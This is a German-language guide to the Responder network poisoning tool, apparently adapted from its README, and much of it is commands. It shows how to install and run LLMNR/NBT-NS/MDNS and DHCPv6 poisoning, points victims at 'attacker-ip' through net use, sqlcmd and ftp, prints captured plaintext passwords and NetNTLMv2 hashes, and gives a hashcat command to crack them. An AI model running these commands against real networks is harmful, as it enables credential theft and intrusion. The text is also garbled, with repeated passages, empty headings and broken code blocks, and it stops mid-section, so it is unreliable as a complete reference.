
Responder ist ein LLMNR-, NBT-NS- und MDNS-Vergifter mit integriertem HTTP/SMB/MSSQL/FTP/LDAP-Rogue-Authentifizierungsserver, der NTLMv1/NTLMv2/LMv2, erweiterte Sicherheit NTLMSSP und Basic-HTTP-Authentifizierung unterstützt.
Responder ist ein LLMNR-, NBT-NS- und MDNS-Poisoner mit integrierten betrügerischen Authentifizierungsservern für HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS und mehr. Es unterstützt NTLMv1/NTLMv2/LMv2, erweitertes NTLMSSP und verschiedene Authentifizierungsmethoden über 15+ Protokolle.
Responder fängt Anmeldedaten ab, indem es auf LLMNR-, NBT-NS- und MDNS-Namensauflösungsanfragen antwortet. Wenn ein Client versucht, einen nicht existierenden Hostnamen aufzulösen, antwortet Responder und leitet den Client zum Angreifer-Rechner, wo mehrere betrügerische Authentifizierungsserver Anmeldedaten abfangen. DHCP- und DHCPv6-betrügerische Server sind ebenfalls enthalten und können separat aktiviert werden.
Erfasste Daten:
Diese Version beinhaltet:
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### Responder installieren```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## Schnellstart
### Grundlegende Vergiftung```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### HTTP-Basisauthentifizierung erzwingen```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
---
## Netzwerkvergiftung
### LLMNR/NBT-NS/MDNS-Vergiftung
**Zweck:** Auf Namensauflösungsfehler reagieren
**Funktionsweise:**
1. Client sendet eine Broadcast-Anfrage nach einem nicht existierenden Host
2. Responder antwortet: „Ich bin dieser Host“
3. Client verbindet sich mit dem Angreifer
4. Anmeldeinformationen werden erfasst
**Konfiguration:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
Verwendung:```bash sudo python3 Responder.py -I eth0 -v
---
### DHCPv6 Server
**Zweck:** Zwingt Clients, den DNS des Angreifers über IPv6 zu nutzen
**Funktionen:**
- ✅ INFORMATION-REQUEST Unterstützung (Windows 10/11)
- ✅ SOLICIT/REQUEST Unterstützung
- ✅ Domain-Filterung (chirurgische Zielauswahl)
- ✅ Router Advertisement (optional)
**Funktionsweise:**
1. Windows sendet DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Responder antwortet: DNS = IPv6 des Angreifers
3. Windows priorisiert IPv6 DNS
4. Alle DNS-Anfragen → Angreifer
5. DNS-Vergiftung → Erfassung von Anmeldedaten
**Konfiguration:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
Verwendung:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**Erwartete Ausgabe:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder enthält 17+ betrügerische Authentifizierungsserver:
Zweck: Erfassung von NetNTLM-Hashes aus Dateifreigaben
Funktionen:
Auslöser:```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**Erfasstes Format:**```
username::domain:challenge:response:blob
Knacken:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**Konfiguration:**```ini
[Responder Core]
SMB = On
Zweck: Erfassen von Klartext-FTP-Anmeldedaten
Funktionen:
Auslöser:```bash ftp attacker-ip
**Erfasstes Format:**```
[FTP] Cleartext: username:password
Konfiguration:```ini [Responder Core] FTP = On
---
### Datenbankserver
#### MSSQL-Server (Port 1433)
**Zweck:** Microsoft SQL Server-Authentifizierung erfassen
**Funktionen:**
- ✅ SQL Server-Authentifizierung
- ✅ Windows-Authentifizierung (NTLM)
- ✅ SQL-Anmeldedaten im Klartext
- ✅ NetNTLMv2-Hash-Erfassung
**Auslöser:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
Erfasste Formate:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**Konfiguration:**```ini
[Responder Core]
SQL = On
Hinweise:
Zweck: Erfassen der E-Mail-Client-Authentifizierung
Funktionen: